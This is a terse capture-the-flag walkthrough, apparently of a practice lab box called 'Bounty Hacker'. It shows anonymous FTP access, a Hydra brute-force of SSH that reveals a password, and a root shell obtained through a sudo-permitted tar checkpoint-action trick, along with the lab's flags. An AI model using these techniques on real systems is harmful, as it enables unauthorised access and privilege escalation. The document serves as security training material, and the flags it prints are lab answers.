$ftp -v -p 10.10.160.230
Connected to 10.10.160.230.
220 (vsFTPd 3.0.3)
Name (10.10.160.230:nair0lf32): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,160,230,169,93)
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.


$hydra -l lin -P '/home/nair0lf32/Desktop/Stuff/THM/Bounty Hacker/locks.txt' 10.10.160.230 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-07 19:54:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.160.230:22/
[22][ssh] host: 10.10.160.230   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found


lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}


$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
(root) /bin/tar

//gtfobins
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)


# cat root.txt
THM{80UN7Y_h4cK3r}


//damn right
